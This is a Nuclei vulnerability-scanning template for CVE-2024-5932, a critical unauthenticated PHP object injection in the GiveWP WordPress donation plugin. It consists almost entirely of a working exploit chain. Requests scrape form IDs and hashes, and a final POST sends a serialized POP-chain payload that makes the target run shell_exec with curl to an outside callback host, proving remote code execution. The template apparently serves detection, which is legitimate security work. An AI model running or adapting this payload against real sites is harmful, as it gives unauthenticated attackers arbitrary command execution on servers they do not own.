id: CVE-2024-5932

info:
  name: GiveWP - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
  impact: |
    This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
  remediation: Fixed in 3.14.2.
  reference:
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/login-register.php#L235
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/process-donation.php#L420
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/src/DonorDashboards/Tabs/EditProfileTab/AvatarRoute.php#L51
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/tecnickcom/tcpdf/tcpdf.php#L7861
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/vendor-prefixed/fakerphp/faker/src/Faker/ValidGenerator.php#L80
    - https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/
    - https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5932
    cwe-id: CWE-502
    epss-score: 0.00178
    epss-percentile: 0.55631
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: givewp
    product: givewp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp

flow: http(1) && http(2) && http(3)

variables:
  oast: "{{interactsh-url}}"
  len_payload: "{{ len(oast) + 5 }}"
  payload: 'O:19:"Stripe\\\\StripeObject":1:{s:7:"_values";a:1:{i:0;O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:9:"container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:9:"generator";O:24:"Give\\\\Container\\\\Container":1:{s:9:"instances";a:1:{s:8:"address1";s:{{len_payload}}:"curl {{oast}}";}}s:10:"maxRetries";i:1;s:9:"validator";s:10:"shell_exec";}}}}}}'
  email: "{{to_lower(rand_text_alpha(8))}}@gmail.com"
  firstname: "{{to_lower(rand_text_alpha(5))}}"
  lastname: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /wp-json/wp/v2/give_forms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"type":'
          - '"guid":'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: value
        internal: true
        json:
          - '.[0].slug'

      - type: json
        part: body
        name: give-form-title
        internal: true
        json:
          - '.[0].title.rendered'

      - type: json
        part: body
        name: links
        internal: true
        json:
          - '.[0].link'
  - raw:
      - |
        GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'give-form-hash'
          - 'give-form-id-prefix'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: give-form-hash
        internal: true
        regex:
          - 'name="give\-form\-hash" value="([0-9a-z]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id-prefix
        internal: true
        regex:
          - 'name="give\-form\-id\-prefix" value="([0-9-]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id
        internal: true
        regex:
          - 'name="give\-form\-id" value="([0-9]+)"'

      - type: regex
        part: body
        group: 1
        name: give-amount
        internal: true
        regex:
          - 'give\-form\-minimum"\n\s+value="([0-9.]+)"\/>'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '"error_data"'
          - '"unknown_error"'
        condition: and
# digest: 4a0a004730450220051775121bbd5c861e8f0adf15b33ef21e3e2420f6ff3e9d42035a160968ba7e02210096d8c4a2c1bf78dd4ec442a1c63d2ea90e194b45a4549c270a864cac3ab0b2c8:922c64590222798bb761d5b6d8e72950